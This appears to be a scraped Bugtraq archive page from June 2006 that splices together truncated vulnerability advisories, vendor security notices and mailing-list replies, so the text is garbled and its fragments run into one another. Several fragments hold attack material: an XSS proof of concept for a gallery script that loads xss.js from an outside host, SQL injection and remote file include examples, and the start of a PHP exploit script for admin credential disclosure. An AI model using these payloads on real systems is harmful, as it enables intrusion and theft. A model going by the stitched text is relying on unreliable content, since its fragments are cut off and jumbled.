Tested with Mosaic 3.00 (the last publicly available), and it crashes (then
again, it crashes on almost all websites)
Attila
- Original Message
From: Amit Klein (AKsecurity) [EMAIL PROTECTED]
To: Vincent Archer [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED]
Sent:
Hi,
I've found that the two methods you described work, e.g. using HTML such as
this:
html
link rel=stylesheet type=text/css href=ascii.css
spanIf this text is orange and an alert appears, the obfuscated JS in the CSS
was evaluated/span
/html
and a CSS file like this:
---ascii.css---
Winged Gallery v1.0
Homepage:
http://winged.info/index.php?p=gallery
XSS vuln on thumb.php:
http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg;''SCRIPT%20SRC=http://youfucktard.com/xss.js/SCRIPTsize=75type=2w=128h=128''
On Tue, Jun 20, 2006, Jain, Siddhartha wrote:
The description says that the DoS occurs when sendmail goes in a deeply
nested malformed MIME message and uses the MIME 8-bit to 7-bit
conversion function. Under what conditions would sendmail use the MIME
8-bit to 7-bit function? Only when the
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 10.6.2006
- -Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011
- --- 0.Description ---
PHP is an HTML-embedded scripting
#!/usr/bin/php -q -d short_open_tag=on
?
echo Jaws = 0.6.2 'Search gadget' SQL injection / admin credentials
disclosure\r\n;
echo by rgod [EMAIL PROTECTED];
echo site: http://retrogod.altervista.org\r\n;;
echo dork: \powered by jaws\ | \powered by the jaws project\ |
Author:JAAScois
Date: 25.6.2006
Type: Heap Overflow
Product: http://live.com , http://messenger.msn.com
Patch: N/A
Link :
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1108/exploit.html
--
Best Regards,
Aleksander Hristov root at securitydot.net
Usenet Script v0.5
Homepage:
http://www.metalhead.ws/usenet
Description:
Those scripts allow you to mirror a Newsgroup in an SQL database. The
development database was Postgresql, but it uses dbx and should therefore be
able to work with other database systems, too. Furthermore, a
===
Ubuntu Security Notice USN-306-1 June 27, 2006
mysql-dfsg-4.1 vulnerability
CVE-2006-3081
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
===
Ubuntu Security Notice USN-305-1 June 27, 2006
openldap2, openldap2.2 vulnerability
CVE-2006-2754
===
A security issue affects the following Ubuntu releases:
Ubuntu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1103-1[EMAIL PROTECTED]
http://www.debian.org/security/ Dann Frazier, Troy Heber
June 27th, 2006
Successful exploitation requires that register_globals= Off .
That seems very strange, doesn't it?
Especially if you look at the source code.
Let's start with search.php, one of the vulnerable vectors:
?php
...
require (init.inc);
and in init.inc:
require (globals.inc);
...
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID: SYMSA-2006-006
Advisory Title : Lotus Domino SMTP Based Denial of Service
Author
Discovered By: CrAzY CrAcKeR
Email:[EMAIL PROTECTED]
Example:-
/funshow.php?idn=[SQL]
Kurdish Security Advisory
irc.gigachat.net #kurdhack
Viva Kurdistan!
SiteBar Script Cross-Site Scripting Attack
Site : http://brablc.com/
Version : All Version
Proof of Concept :
http://www.site.com/sitebar/command.php?command=[CODES]
Original Advisory :
On Tue, Jun 20, 2006 at 02:32:16PM -, [EMAIL PROTECTED] wrote:
Credits:
--
Discovered by: David Aesthetico Vieira-Kurz
http://www.majorsecurity.de
Original Advisory:
--
I reported this bug on 2006-06-09 !
http://bugzilla.cpanel.net/show_bug.cgi?id=4282
I was not released the bug because the vendor doesnt released the patch .
With regards,
http://securitynews.ir/
discovery by the staff of http://MexHackTeam.org
You may be making some erroneous assumptions about who, or what, PHP
quantifies a web developer as. As the manual notes, PHP scales,
security wide, from extremely rigid to extremely flexible, as needed.
It is simultaneously being used as a multi-million-users piece of core
software
On Jun 24, 2006, at 3:42 PM, Darren Reed wrote:
In some mail from john mullee, sie said:
--- Darren Reed [EMAIL PROTECTED] wrote:
I guess most of the remaining offending apps were written in C: as
much as 96% ?!!
(including basically all of microsoft's stuff!!)
Surely the least secure
-BEGIN PGP SIGNED MESSAGE-
__
SUSE Security Announcement
Package:freetype2, freetype2-devel
Announcement ID:SUSE-SA:2006:037
Date:
#
# Kurdish Security Advisory
# MF Piadas 1.0 Remote File Include Vulnerability
# Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz .
Abdullah Ocalan
# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !
#
###
Luigi Auriemma
Application: Quake 3 engine
http://www.idsoftware.com
http://www.icculus.org/quake3/
Versions: Quake 3 = 1.32c
Title:
[Kil13r-SA-20060628] Hanaro Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/22 - Discovery
2006/06/28 - Release
Affected version:
Not affected version:
Description:
Hanaro is ISP site, but that has
23 matches
Mail list logo